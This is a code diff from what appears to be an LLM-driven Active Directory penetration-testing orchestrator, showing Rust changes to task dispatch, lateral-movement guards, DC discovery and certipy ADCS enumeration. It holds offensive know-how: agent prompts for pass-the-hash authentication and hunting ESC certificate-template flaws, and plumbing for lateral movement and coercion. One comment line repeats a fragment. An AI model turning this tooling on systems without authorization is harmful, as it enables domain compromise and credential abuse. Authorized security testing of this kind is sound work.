         target_role: &str,
         role: ares_llm::tool_registry::AgentRole,
         payload: serde_json::Value,
-    ) -> Result<Option<String>> {
+        priority: i32,
+    ) -> Result<SubmissionOutcome> {
         // Per-credential concurrency gate: if too many tasks are already
         // in-flight for this credential, defer instead of spawning another.
         let cred_key = super::credential_key_from_payload(&payload);
         if let Some(ref key) = cred_key {
             if !self.credential_inflight.try_acquire(key).await {
-                info!(
+                debug!(
                     credential = key.as_str(),
                     task_type,
                     "Credential concurrency limit reached, deferring task"
                 );
                 let task = DeferredTask {
-                    priority: 3,
+                    priority,
                     enqueue_time: Utc::now().timestamp() as f64,
                     task_type: task_type.to_string(),
                     target_role: target_role.to_string(),
                     payload,
                     source_agent: "orchestrator".to_string(),
                 };
-                let _ = self.deferred.enqueue(&task).await;
-                return Ok(None);
+                return match self.deferred.enqueue(&task).await {
+                    Ok(true) => Ok(SubmissionOutcome::Deferred),
+                    Ok(false) => {
+                        warn!(
+                            credential = key.as_str(),
+                            task_type, "Deferred queue full while gating on cred — task dropped"
+                        );
+                        Ok(SubmissionOutcome::Dropped)
+                    }
+                    Err(e) => {
+                        warn!(err = %e, "Failed to defer cred-gated task");
+                        Ok(SubmissionOutcome::Dropped)
+                    }
+                };
            }
         }
 
@@ -184,6 +252,7 @@ impl Dispatcher {
                 task_type: task_type.to_string(),
                 role: target_role.to_string(),
                 submitted_at: std::time::Instant::now(),
+                credential_key: cred_key.clone(),
             })
             .await;
 
@@ -208,6 +277,13 @@ impl Dispatcher {
         if let Some(ref key) = cred_key {
             task_params.insert("credential_key".to_string(), serde_json::json!(key));
         }
+        // Propagate task metadata so process_completed_task can access them
+        // (mark_host_owned needs target_ip, domain attribution needs domain).
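+        // e.g. a payload of {"target_ip": "192.168.58.10", "domain":
+        // "contoso.local", "credential": {...}} contributes exactly the
+        // target_ip and domain entries here; other payload fields are
+        // deliberately not copied (sketch of the intent, not a schema).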
+        for key in &["target_ip", "domain"] {
+            if let Some(val) = payload.get(*key) {
+                task_params.insert(key.to_string(), val.clone());
+            }
+        }
         let task_info = ares_core::models::TaskInfo {
             task_id: task_id.clone(),
             task_type: task_type.to_string(),
@@ -235,8 +311,6 @@ impl Dispatcher {
         let queue = self.queue.clone();
         let tid = task_id.clone();
         let tt = task_type.to_string();
-        let cred_inflight = self.credential_inflight.clone();
-        let cred_key_owned = cred_key.clone();
 
         tokio::spawn(async move {
             let outcome = runner.execute_task(&tt, &tid, role, &payload).await;
@@ -253,11 +327,30 @@ impl Dispatcher {
                 Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries))
             };
 
-            // Collect raw tool outputs for secondary regex extraction
+            // LLM-fabricated findings (`report_finding`,
+            // `report_lateral_success`) are kept on a SEPARATE field so
+            // `extract_discoveries` (which only reads "discoveries")
+            // never feeds them into `publish_*` state writes. Reports
+            // surface them under `llm_findings` for context only.
+            let llm_findings_json: Option<Value> = if outcome.llm_findings.is_empty() {
+                None
+            } else {
+                Some(Value::Array(outcome.llm_findings.clone()))
+            };
+
+            // Collect raw tool outputs for secondary regex extraction.
+            // Serialize as objects {name, arguments, output} so consumers
+            // can be tool-aware (skip credential regex for hash-auth invocations).
             let tool_outputs_json: Vec<Value> = outcome
                 .tool_outputs
                 .iter()
-                .map(|s| Value::String(s.clone()))
+                .map(|to| {
+                    serde_json::json!({
+                        "name": to.name,
+                        "arguments": to.arguments,
+                        "output": to.output,
+                    })
+                })
                 .collect();
 
             match &outcome.reason {
@@ -291,13 +384,18 @@ impl Dispatcher {
                     // The LLM's task_complete result is untrusted prose —
                     // any discovery-like keys it contains are ignored.
                     // Only ares-tools parsers (run on real tool stdout)
-                    // produce authoritative discoveries.
+                    // produce authoritative discoveries. LLM-fabricated
+                    // findings live on a separate `llm_findings` field.
                     if let Some(obj) = result_json.as_object_mut() {
                         obj.remove("discoveries");
+                        obj.remove("llm_findings");
                     }
                     if let Some(disc) = merged_discoveries {
                         result_json["discoveries"] = disc;
                     }
+                    if let Some(findings) = llm_findings_json.clone() {
+                        result_json["llm_findings"] = findings;
+                    }
                     if !tool_outputs_json.is_empty() {
                         result_json["tool_outputs"] =
                             Value::Array(tool_outputs_json.clone());
@@ -320,6 +418,9 @@ impl Dispatcher {
                     if let Some(disc) = merged_discoveries {
                         result_json["discoveries"] = disc;
                     }
+                    if let Some(findings) = llm_findings_json.clone() {
+                        result_json["llm_findings"] = findings;
+                    }
                     if !tool_outputs_json.is_empty() {
                         result_json["tool_outputs"] =
                             Value::Array(tool_outputs_json.clone());
@@ -344,6 +445,9 @@ impl Dispatcher {
                     if let Some(disc) = merged_discoveries {
                         result_json["discoveries"] = disc;
                     }
+                    if let Some(findings) = llm_findings_json.clone() {
+                        result_json["llm_findings"] = findings;
+                    }
                    if !tool_outputs_json.is_empty() {
                         result_json["tool_outputs"] =
                             Value::Array(tool_outputs_json.clone());
@@ -363,15 +467,27 @@ impl Dispatcher {
                     if let Some(disc) = merged_discoveries {
                         result_json["discoveries"] = disc;
                     }
+                    if let Some(findings) = llm_findings_json.clone() {
+                        result_json["llm_findings"] = findings;
+                    }
                     if !tool_outputs_json.is_empty() {
                         result_json["tool_outputs"] =
                             Value::Array(tool_outputs_json.clone());
                     }
+                    // Bare end-of-turn means the LLM stopped without
+                    // calling task_complete or request_assistance — it
+                    // is a stall, not a success. Treating it as success
Treating it as success + // lets capability-gap exits masquerade as + // accomplished objectives in run accounting. TaskResult { task_id: tid.clone(), - success: true, + success: false, result: Some(result_json), - error: None, + error: Some( + "Agent ended turn without task_complete or \ + request_assistance" + .into(), + ), completed_at: Some(Utc::now()), worker_pod: Some("rust-llm-runner".into()), agent_name: Some(tt.clone()), @@ -385,6 +501,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -452,10 +571,12 @@ impl Dispatcher { } } - // Release per-credential concurrency slot - if let Some(ref key) = cred_key_owned { - cred_inflight.release(key).await; - } + // The CredentialInflight slot is released by whichever caller + // evicts this task from `ActiveTaskTracker` — either the result + // consumer when it picks up the result, or the stale-task + // cleanup when this future has hung past the timeout. That + // mirrors the slot to the tracker entry's lifetime, so a hung + // future doesn't pin the slot indefinitely. // Push result to the normal result queue so the result consumer picks it up if let Err(e) = queue.send_result(&tid, &result).await { @@ -467,6 +588,6 @@ impl Dispatcher { } }); - Ok(Some(task_id)) + Ok(SubmissionOutcome::Submitted(task_id)) } } diff --git a/ares-cli/src/orchestrator/dispatcher/task_builders.rs b/ares-cli/src/orchestrator/dispatcher/task_builders.rs index 06b8c01f..11cda875 100644 --- a/ares-cli/src/orchestrator/dispatcher/task_builders.rs +++ b/ares-cli/src/orchestrator/dispatcher/task_builders.rs @@ -4,7 +4,7 @@ use anyhow::Result; use serde_json::json; use tracing::{debug, info}; -use crate::orchestrator::state::DEDUP_SCANNED_TARGETS; +use crate::orchestrator::state::{DEDUP_CROSS_REALM_LATERAL, DEDUP_SCANNED_TARGETS}; use super::Dispatcher; @@ -219,12 +219,75 @@ impl Dispatcher { } /// Submit a lateral movement task. + /// + /// Refuses to dispatch when the credential's realm differs from the target + /// host's realm and no trust path is known — wrong-realm NTLM/Kerberos auth + /// against a foreign DC just returns ACCESS_DENIED and burns LLM tokens + /// (see the swarm of CHILD\dave → sql01.fabrikam.local failures). pub async fn request_lateral( &self, target_ip: &str, credential: &ares_core::models::Credential, technique: &str, ) -> Result> { + // Stable key shared with the cross-realm guard below so a rejection + // permanently suppresses retries from credential_expansion and the LLM. + let cross_realm_key = format!( + "{}|{}|{}|{}", + credential.domain.to_lowercase(), + credential.username.to_lowercase(), + target_ip, + technique + ); + + { + let state = self.state.read().await; + if state.is_processed(DEDUP_CROSS_REALM_LATERAL, &cross_realm_key) { + debug!( + target_ip = target_ip, + cred_user = %credential.username, + technique = technique, + "Skipping lateral — already rejected as cross-realm dead-end" + ); + return Ok(None); + } + } + + // Resolve target's realm from state.hosts (FQDN suffix). 
+        let target_domain = {
+            let state = self.state.read().await;
+            state
+                .hosts
+                .iter()
+                .find(|h| h.ip == target_ip)
+                .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase()))
+        };
+        if let Some(td) = target_domain {
+            let cd = credential.domain.to_lowercase();
+            if !cd.is_empty()
+                && cd != td
+                && !td.ends_with(&format!(".{cd}"))
+                && !cd.ends_with(&format!(".{td}"))
+            {
+                tracing::warn!(
+                    target_ip = %target_ip,
+                    target_domain = %td,
+                    cred_domain = %cd,
+                    cred_user = %credential.username,
+                    technique = %technique,
+                    "Refusing cross-realm lateral movement — use forest_trust_escalation or get a same-realm credential first"
+                );
+                {
+                    let mut state = self.state.write().await;
+                    state.mark_processed(DEDUP_CROSS_REALM_LATERAL, cross_realm_key.clone());
+                }
+                let _ = self
+                    .state
+                    .persist_dedup(&self.queue, DEDUP_CROSS_REALM_LATERAL, &cross_realm_key)
+                    .await;
+                return Ok(None);
+            }
+        }
         let payload = json!({
             "technique": technique,
             "target_ip": target_ip,
@@ -429,23 +492,78 @@ impl Dispatcher {
     }
 
     /// Submit a CERTIPY find task for ADCS enumeration.
+    ///
+    /// `ntlm_hash` and `hash_username` enable pass-the-hash authentication when
+    /// no cleartext credential is available for the target domain.
     pub async fn request_certipy_find(
         &self,
         target_ip: &str,
         domain: &str,
         credential: &ares_core::models::Credential,
+        ntlm_hash: Option<&str>,
+        hash_username: Option<&str>,
+        ca_host_ip: Option<&str>,
     ) -> Result<Option<String>> {
-        let payload = json!({
+        // When PTH hash is available, use the hash user's identity for the target domain
+        let (cred_user, cred_pass, cred_domain) = if let Some(_hash) = ntlm_hash {
+            let user = hash_username.unwrap_or(&credential.username);
+            (user.to_string(), String::new(), domain.to_string())
+        } else {
+            (
+                credential.username.clone(),
+                credential.password.clone(),
+                credential.domain.clone(),
+            )
+        };
+
+        let mut payload = json!({
             "technique": "certipy_find",
             "target_ip": target_ip,
             "domain": domain,
             "credential": {
-                "username": credential.username,
-                "password": credential.password,
-                "domain": credential.domain,
+                "username": cred_user,
+                "password": cred_pass,
+                "domain": cred_domain,
             },
+            "instructions": concat!(
+                "Run the certipy_find tool with vulnerable=true to enumerate vulnerable ",
+                "certificate templates and CAs.\n\n",
+                "IMPORTANT: You MUST pass vulnerable=true to certipy_find. Without it, the ",
+                "output will not flag ESC vulnerabilities and no vulns will be registered.\n\n",
+                "AUTHENTICATION: If password is empty and an NTLM hash is provided, use the ",
+                "certipy_find tool with the 'hashes' parameter (format ':nthash'). Do NOT pass ",
+                "an empty password.\n\n",
+                "If a password IS provided, use certipy_find with 'password' parameter.\n\n",
+                "For each vulnerable template found, register a vulnerability with:\n",
+                "  vuln_type: the ESC type (e.g. 'esc1', 'esc2', 'esc3', 'esc4', 'esc6', 'esc8', 'esc10', 'esc15')\n",
+                "  target: the certificate template name\n",
+                "  target_ip: the CA server IP\n",
+                "  domain: the domain\n",
+                "  details: include template_name, ca_name, enrollee_supplies_subject, ",
+                "client_authentication, any_purpose, enrollment_rights, and which users/groups can enroll\n\n",
+                "Check for: ESC1 (Enrollee Supplies Subject + Client Auth), ESC2 (Any Purpose EKU), ",
+                "ESC3 (enrollment agent), ESC4 (template ACL abuse), ESC6 (EDITF flag), ",
+                "ESC7 (ManageCA), ESC8 (Web Enrollment HTTP relay), ESC9 (UPN Spoofing), ",
+                "ESC10 (Weak Certificate Mapping / StrongCertificateBindingEnforcement=0), ",
+                "ESC11 (RPC enrollment relay / IF_ENFORCEENCRYPTICERTREQUEST disabled), ",
+                "ESC13 (Issuance Policy), ESC15 (Application Policy OID / CVE-2024-49019).\n",
+                "If certipy_find fails, try with -stdout flag."
+            ),
         });
-        self.throttled_submit("recon", "recon", payload, 4).await
+        // Attach hash for PTH authentication
+        if let Some(hash) = ntlm_hash {
+            payload["ntlm_hash"] = json!(hash);
+            if let Some(user) = hash_username {
+                payload["hash_username"] = json!(user);
+            }
+        }
+        // CA host IP for parser to set correct vuln target
+        if let Some(ca_ip) = ca_host_ip {
+            payload["ca_host_ip"] = json!(ca_ip);
+        }
+        // task_type "recon" → recon prompt template (supports instructions/ntlm_hash)
+        // target_role "privesc" → privesc tools (certipy_find is only in privesc)
+        self.throttled_submit("recon", "privesc", payload, 4).await
     }
 
     /// Refresh the operation lock TTL. Called periodically.
diff --git a/ares-cli/src/orchestrator/exploitation.rs b/ares-cli/src/orchestrator/exploitation.rs
index 2e3ce418..698ac107 100644
--- a/ares-cli/src/orchestrator/exploitation.rs
+++ b/ares-cli/src/orchestrator/exploitation.rs
@@ -16,8 +16,30 @@ use tracing::{debug, info, warn};
 
 use ares_core::models::VulnerabilityInfo;
 
+use crate::orchestrator::automation::EXPLOITABLE_ESC_TYPES;
 use crate::orchestrator::dispatcher::Dispatcher;
 
+fn is_automation_owned_vuln(vtype: &str) -> bool {
+    let vtype = vtype.to_lowercase();
+    vtype == "constrained_delegation"
+        || vtype == "unconstrained_delegation"
+        || vtype == "rbcd"
+        || vtype == "child_to_parent"
+        || vtype == "forest_trust_escalation"
+        || vtype == "smb_signing_disabled"
+        || vtype == "ldap_signing_disabled"
+        || vtype == "ldap_signing_not_required"
+        || vtype == "ntlmv1_downgrade"
+        || vtype == "genericall"
+        || vtype == "genericwrite"
+        || vtype == "writedacl"
+        || vtype == "writeowner"
+        || vtype == "forcechangepassword"
+        || vtype == "self_membership"
+        || vtype == "write_membership"
+        || EXPLOITABLE_ESC_TYPES.contains(&vtype.as_str())
+}
+
 /// Cooldown before re-dispatching a failed exploit for the same vulnerability.
 const EXPLOIT_RETRY_COOLDOWN: Duration = Duration::from_secs(120);
 
@@ -67,20 +89,25 @@ pub async fn exploitation_workflow(
         // Try to pop the highest-priority vuln from the ZSET
         match pop_next_vuln(&dispatcher).await {
             Ok(Some(vuln)) => {
-                // Skip delegation vulns — s4u.rs handles these with proper
-                // credential checking and lockout-aware dispatch. The generic
-                // exploitation path falls back to wrong credentials and
-                // produces LLM errors with missing target_spn.
+                // Skip vulns owned by dedicated automation modules — the
+                // generic exploitation path picks the wrong worker role and
+                // falls back to wrong credentials, producing LLM errors:
+                // - delegation (constrained/unconstrained/rbcd) is handled
+                //   by s4u.rs with credential checking and lockout-aware
+                //   dispatch.
+                // - ADCS ESC types are handled by auto_adcs_exploitation,
+                //   which routes each ESC variant to the correct role
+                //   (e.g. coercion for ESC8/ESC11, privesc for ESC1/ESC4)
+                //   via role_for_esc_type. Dropping them from the ZSET is
+                //   safe because that automation reads from
+                //   state.discovered_vulnerabilities, not the ZSET.
                 {
                     let vtype = vuln.vuln_type.to_lowercase();
-                    if vtype == "constrained_delegation"
-                        || vtype == "unconstrained_delegation"
-                        || vtype == "rbcd"
-                    {
+                    if is_automation_owned_vuln(&vtype) {
                         debug!(
                             vuln_id = %vuln.vuln_id,
                             vuln_type = %vuln.vuln_type,
-                            "Skipping delegation vuln (handled by s4u automation)"
+                            "Skipping vuln handled by dedicated automation"
                         );
                         continue;
                     }
@@ -106,6 +133,15 @@ pub async fn exploitation_workflow(
                     }
                 }
 
+                // Skip vulns that have crossed MAX_EXPLOIT_FAILURES — without this
+                // a stuck exploit (e.g. mssql_access with 0 creds in state) loops
+                // every cooldown for the entire op. The vuln is dropped from the
+                // queue, not re-enqueued.
+                if dispatcher.state.is_exploit_abandoned(&vuln.vuln_id).await {
+                    debug!(vuln_id = %vuln.vuln_id, "Vuln abandoned (max failures), skipping");
+                    continue;
+                }
+
                 // Check dispatch cooldown to prevent rapid re-dispatch
                 if let Some(last) = dispatched_at.get(&vuln.vuln_id) {
                     if last.elapsed() < EXPLOIT_RETRY_COOLDOWN {
@@ -208,3 +244,39 @@ async fn requeue_vuln(dispatcher: &Dispatcher, vuln: &VulnerabilityInfo) -> Result<()> {
     let _: () = conn.zadd(&key, &json, score).await?;
     Ok(())
 }
+
+#[cfg(test)]
+mod tests {
+    use super::is_automation_owned_vuln;
+
+    #[test]
+    fn automation_owned_vulns_are_skipped_by_generic_exploitation() {
+        for vtype in [
+            "constrained_delegation",
+            "unconstrained_delegation",
+            "rbcd",
+            "child_to_parent",
+            "forest_trust_escalation",
+            "smb_signing_disabled",
+            "ldap_signing_disabled",
+            "ldap_signing_not_required",
+            "ntlmv1_downgrade",
+            "esc1",
+        ] {
+            assert!(
+                is_automation_owned_vuln(vtype),
+                "{vtype} should be automation-owned"
+            );
+        }
+    }
+
+    #[test]
+    fn generic_exploit_vulns_still_allowed() {
+        for vtype in ["mssql_access", "zerologon", "gpo_abuse"] {
+            assert!(
+                !is_automation_owned_vuln(vtype),
+                "{vtype} should remain generic"
+            );
+        }
+    }
+}
diff --git a/ares-cli/src/orchestrator/llm_runner.rs b/ares-cli/src/orchestrator/llm_runner.rs
index 039db0cb..dccae767 100644
--- a/ares-cli/src/orchestrator/llm_runner.rs
+++ b/ares-cli/src/orchestrator/llm_runner.rs
@@ -7,7 +7,7 @@ use std::sync::{Arc, OnceLock};
 
 use anyhow::Result;
 
-use tracing::{debug, info, warn};
+use tracing::{info, warn};
 
 use ares_llm::prompt::templates;
 use ares_llm::prompt::StateSnapshot;
@@ -31,6 +31,9 @@ pub struct LlmTaskRunner {
     /// Sorted technique priorities from strategy (technique, weight).
     /// Passed to the system prompt template to render a dynamic priority table.
     technique_priorities: Vec<(String, i32)>,
+    /// Orchestrator's relay/listener IP. Surfaced to the LLM in the system
+    /// prompt so it doesn't hallucinate a subnet-gateway IP for coercion args.
+    listener_ip: Option<String>,
     /// Deferred callback handler — set after construction to break the
     /// `LlmTaskRunner → Dispatcher → LlmTaskRunner` circular dependency.
     callback_handler: OnceLock<Arc<OrchestratorCallbackHandler>>,
 }
 
 impl LlmTaskRunner {
@@ -44,6 +47,7 @@ impl LlmTaskRunner {
         state: SharedState,
         temperature: Option<f32>,
         technique_priorities: Vec<(String, i32)>,
+        listener_ip: Option<String>,
     ) -> Self {
         // Layer env-var overrides (ARES_AGENT_*, ARES_CONTEXT_*, ARES_BUDGET_*,
         // ARES_SESSION_LOG_*) on top of compiled defaults so operators can
@@ -55,6 +59,7 @@ impl LlmTaskRunner {
             state,
             config,
             technique_priorities,
+            listener_ip,
             callback_handler: OnceLock::new(),
         }
     }
@@ -91,7 +96,12 @@ impl LlmTaskRunner {
         let snapshot = self.state.snapshot().await;
 
         // 2. Build system prompt from agent template
-        let system_prompt = build_system_prompt(role, &snapshot, &self.technique_priorities)?;
+        let system_prompt = build_system_prompt(
+            role,
+            &snapshot,
+            &self.technique_priorities,
+            self.listener_ip.as_deref(),
+        )?;
 
         // 3. Build task prompt from Tera template + payload
         let task_prompt = build_task_prompt(task_type, task_id, payload, &snapshot)?;
@@ -162,6 +172,7 @@ fn build_system_prompt(
     role: AgentRole,
     snapshot: &StateSnapshot,
     technique_priorities: &[(String, i32)],
+    listener_ip: Option<&str>,
 ) -> Result<String> {
     // Get capabilities from the tool definitions for this role
     let tools = tool_registry::tools_for_role(role);
@@ -188,7 +199,7 @@ fn build_system_prompt(
     } else {
         Some(technique_priorities)
     };
-    let system_instructions = templates::render_system_instructions(None, priorities)?;
+    let system_instructions = templates::render_system_instructions(None, priorities, listener_ip)?;
 
     // Render agent-specific instructions
     let agent_instructions = templates::render_agent_instructions(
@@ -273,10 +284,10 @@ fn log_outcome(task_id: &str, outcome: &AgentLoopOutcome) {
             );
         }
         LoopEndReason::EndTurn { content } => {
-            debug!(
+            warn!(
                 task_id = task_id,
                 steps = outcome.steps,
-                "LLM agent ended turn: {content}"
+                "LLM agent ended turn without task_complete: {content}"
             );
         }
         LoopEndReason::MaxTokens => {
@@ -379,7 +390,7 @@ mod tests {
             AgentRole::Coercion,
             AgentRole::Orchestrator,
         ] {
-            let result = build_system_prompt(*role, &snapshot, &[]);
+            let result = build_system_prompt(*role, &snapshot, &[], None);
             assert!(result.is_ok(), "Failed for role: {:?}", role);
             let prompt = result.unwrap();
             assert!(!prompt.is_empty(), "Empty prompt for role: {:?}", role);
diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs
index 003bd7af..5184e9c7 100644
--- a/ares-cli/src/orchestrator/mod.rs
+++ b/ares-cli/src/orchestrator/mod.rs
@@ -153,43 +153,75 @@ async fn run_inner() -> Result<()> {
     // Seed domain_controllers from target IPs so automation tasks
     // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire
     // immediately without waiting for recon to report back.
-    // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP.
+    //
+    // Probe ALL target IPs on port 88/389 to find every DC, then query
+    // each DC's LDAP rootDSE (`defaultNamingContext`) to discover which
+    // domain it serves. This eliminates the race condition where
+    // automation tasks fire before recon discovers child-domain DCs
+    // (e.g. child.contoso.local at 192.168.58.11 vs the parent
+    // contoso.local at 192.168.58.10).
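+    // For the example topology above, discover_dc_domains would yield
+    // [("contoso.local", "192.168.58.10"), ("child.contoso.local",
+    // "192.168.58.11")]: one entry per unique domain, first responding DC
+    // wins (illustrative values only).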
     if state.domain_controllers.is_empty() {
-        let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await;
-        if let Some(ref ip) = dc_ip {
+        let dc_map = bootstrap::discover_dc_domains(&config.target_ips, &domain).await;
+
+        if !dc_map.is_empty() {
             let dc_key = format!(
                 "{}:{}:{}",
                 ares_core::state::KEY_PREFIX,
                 state.operation_id,
                 ares_core::state::KEY_DC_MAP,
             );
+            let domain_key = format!("ares:op:{}:domains", state.operation_id);
             let mut conn = queue.connection();
+
+            for (dc_domain, dc_ip) in &dc_map {
+                let _: Result<(), _> =
+                    redis::AsyncCommands::hset(&mut conn, &dc_key, dc_domain, dc_ip).await;
+                state
+                    .domain_controllers
+                    .insert(dc_domain.clone(), dc_ip.clone());
+
+                // Add discovered domains to the domains list so automation
+                // tasks can enumerate them (AS-REP roast, BloodHound, etc.)
+                if !state.domains.contains(dc_domain) {
+                    state.domains.push(dc_domain.clone());
+                    let _: Result<(), _> =
+                        redis::AsyncCommands::sadd(&mut conn, &domain_key, dc_domain).await;
+                }
+
+                info!(
+                    domain = %dc_domain,
+                    dc_ip = %dc_ip,
+                    "Seeded domain controller from bootstrap DC discovery"
+                );
+            }
+
             let _: Result<(), _> =
-                redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await;
-            state.domain_controllers.insert(domain.clone(), ip.clone());
-            info!(
-                domain = %domain,
-                dc_ip = %ip,
-                "Seeded domain controller from target IPs (port 88 probe)"
-            );
+                redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await;
 
-            // Also register the credential's domain (may differ from target_domain,
-            // e.g., child.contoso.local vs contoso.local).
-            // This ensures automation tasks (spray, kerberoast) can find a DC
-            // for the credential's domain.
+            // Also register the credential's domain if not already mapped.
+            // The credential domain may differ from any discovered DC domain
+            // (e.g. if the credential is for a domain whose DC is behind a
+            // firewall and didn't respond to probes).
             if let Some(ref cred) = config.initial_credential {
                 let cred_domain = cred.domain.to_lowercase();
-                if cred_domain != domain && !cred_domain.is_empty() {
-                    let _: Result<(), _> =
-                        redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip)
-                            .await;
+                if !cred_domain.is_empty()
+                    && !state.domain_controllers.contains_key(&cred_domain)
+                {
+                    // Use the first discovered DC as fallback for the
+                    // credential's domain — better than no mapping at all.
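+                    // e.g. a CHILD\svc credential whose own DC never answered
+                    // the probe gets mapped to dc_map[0]'s IP: a best-effort
+                    // guess rather than a verified mapping (sketch of intent).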
+                    let fallback_ip = &dc_map[0].1;
+                    let _: Result<(), _> = redis::AsyncCommands::hset(
+                        &mut conn,
+                        &dc_key,
+                        &cred_domain,
+                        fallback_ip,
+                    )
+                    .await;
                     state
                         .domain_controllers
-                        .insert(cred_domain.clone(), ip.clone());
-                    // Also add this domain to the domains set
+                        .insert(cred_domain.clone(), fallback_ip.clone());
                     if !state.domains.contains(&cred_domain) {
                         state.domains.push(cred_domain.clone());
-                        let domain_key = format!("ares:op:{}:domains", state.operation_id);
                         let _: Result<(), _> = redis::AsyncCommands::sadd(
                             &mut conn,
                             &domain_key,
@@ -199,8 +231,8 @@ async fn run_inner() -> Result<()> {
                     }
                     info!(
                         cred_domain = %cred_domain,
-                        dc_ip = %ip,
-                        "Also registered credential domain in DC map"
+                        dc_ip = %fallback_ip,
+                        "Registered credential domain with fallback DC"
                     );
                 }
             }
@@ -312,18 +344,24 @@ async fn run_inner() -> Result<()> {
     let tool_disp: Arc<dyn tool_dispatcher::ToolDispatcher> =
         if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") {
             info!("Tool dispatch: local (in-process via ares-tools)");
-            Arc::new(tool_dispatcher::LocalToolDispatcher::new(
-                queue.clone(),
-                config.operation_id.clone(),
-                auth_throttle.clone(),
-            ))
+            Arc::new(
+                tool_dispatcher::LocalToolDispatcher::new(
+                    queue.clone(),
+                    config.operation_id.clone(),
+                    auth_throttle.clone(),
+                )
+                .with_state(shared_state.clone()),
+            )
         } else {
             info!("Tool dispatch: Redis queue (ares:tool_exec:{{role}})");
-            Arc::new(tool_dispatcher::RedisToolDispatcher::new(
-                queue.clone(),
-                config.operation_id.clone(),
-                auth_throttle.clone(),
-            ))
+            Arc::new(
+                tool_dispatcher::RedisToolDispatcher::new(
+                    queue.clone(),
+                    config.operation_id.clone(),
+                    auth_throttle.clone(),
+                )
+                .with_state(shared_state.clone()),
+            )
         };
 
     // Build sorted technique priorities for the LLM system prompt.
@@ -342,6 +380,7 @@ async fn run_inner() -> Result<()> {
         shared_state.clone(),
         config.strategy.llm_temperature,
         technique_priorities,
+        config.listener_ip.clone(),
     ));
     info!(
         model = %model_name,
@@ -378,6 +417,7 @@ async fn run_inner() -> Result<()> {
         queue.clone(),
         registry.clone(),
         tracker.clone(),
+        dispatcher.credential_inflight.clone(),
         config.clone(),
         shutdown_rx.clone(),
     );
@@ -385,6 +425,7 @@ async fn run_inner() -> Result<()> {
     let (_result_handle, mut result_rx) = spawn_result_consumer(
         queue.clone(),
         tracker.clone(),
+        dispatcher.credential_inflight.clone(),
         config.clone(),
         shutdown_rx.clone(),
     );
@@ -399,6 +440,17 @@ async fn run_inner() -> Result<()> {
 
     let cost_handle = spawn_cost_summary(queue.clone(), config.clone(), shutdown_rx.clone());
 
+    // Candidate-domain probe worker — verifies hostname-inferred domains
+    // (e.g. `corp.example.com` derived from `host.corp.example.com`) via
+    // `_ldap._tcp.dc._msdcs.<domain>` SRV lookups before promoting them.
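+    // e.g. a candidate `corp.example.com` is promoted only if
+    // `_ldap._tcp.dc._msdcs.corp.example.com` resolves to at least one SRV
+    // record (a cheap DNS existence check; assumed semantics, see
+    // state::domain_probe for the authoritative behavior).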
+    let probe_ctx = state::domain_probe::DomainProbeContext {
+        state: shared_state.clone(),
+        queue: queue.clone(),
+        prober: Arc::new(state::domain_probe::DnsSrvProber::from_system()),
+    };
+    let probe_handle =
+        state::domain_probe::spawn_domain_probe_worker(probe_ctx, shutdown_rx.clone());
+
     // Exploitation workflow
     let exploit_disp = dispatcher.clone();
     let exploit_shutdown = shutdown_rx.clone();
@@ -621,6 +673,7 @@ async fn run_inner() -> Result<()> {
                 let (_new_handle, new_rx) = spawn_result_consumer(
                     queue.clone(),
                     tracker.clone(),
+                    dispatcher.credential_inflight.clone(),
                     config.clone(),
                     shutdown_rx.clone(),
                 );
@@ -665,6 +718,7 @@ async fn run_inner() -> Result<()> {
         hb_handle,
         deferred_handle,
         cost_handle,
+        probe_handle,
         exploit_handle,
         disc_handle,
         refresh_handle,
diff --git a/ares-cli/src/orchestrator/monitoring.rs b/ares-cli/src/orchestrator/monitoring.rs
index a6e93321..3189a9f5 100644
--- a/ares-cli/src/orchestrator/monitoring.rs
+++ b/ares-cli/src/orchestrator/monitoring.rs
@@ -13,6 +13,7 @@ use tokio::sync::watch;
 use tracing::{debug, info, warn};
 
 use crate::orchestrator::config::OrchestratorConfig;
+use crate::orchestrator::dispatcher::CredentialInflight;
 use crate::orchestrator::routing::ActiveTaskTracker;
 use crate::orchestrator::task_queue::TaskQueue;
 
@@ -193,6 +194,7 @@ pub fn spawn_heartbeat_monitor(
     queue: TaskQueue,
     registry: AgentRegistry,
     tracker: ActiveTaskTracker,
+    credential_inflight: CredentialInflight,
     config: Arc<OrchestratorConfig>,
     mut shutdown: watch::Receiver<bool>,
 ) -> tokio::task::JoinHandle<()> {
@@ -227,7 +229,9 @@ pub fn spawn_heartbeat_monitor(
                 consecutive_failures = 0;
 
                 // Clean up stale tasks (salvage any pending results first)
-                if let Err(e) = cleanup_stale_tasks(&tracker, &queue, &config).await {
+                if let Err(e) =
+                    cleanup_stale_tasks(&tracker, &queue, &credential_inflight, &config).await
+                {
                     warn!(err = %e, "Stale task cleanup failed");
                 }
             }
@@ -282,6 +286,7 @@ async fn run_heartbeat_sweep(
 async fn cleanup_stale_tasks(
     tracker: &ActiveTaskTracker,
     queue: &TaskQueue,
+    credential_inflight: &CredentialInflight,
     config: &OrchestratorConfig,
 ) -> Result<()> {
     let llm_count = tracker.llm_task_count().await;
@@ -317,7 +322,16 @@ async fn cleanup_stale_tasks(
                 "Removing stale task"
             );
         }
-        tracker.remove(&task.task_id).await;
+        // Release the per-credential inflight slot if the stale task held
+        // one. Without this the slot leaks: the spawned LLM future may
+        // still be running long after the task was declared stale, and
+        // every subsequent task with the same credential gets deferred
+        // until the future eventually returns.
+        if let Some(removed) = tracker.remove(&task.task_id).await {
+            if let Some(ref key) = removed.credential_key {
+                credential_inflight.release(key).await;
+            }
+        }
     }
 
     if !stale.is_empty() {
@@ -344,7 +358,7 @@ pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[
     ),
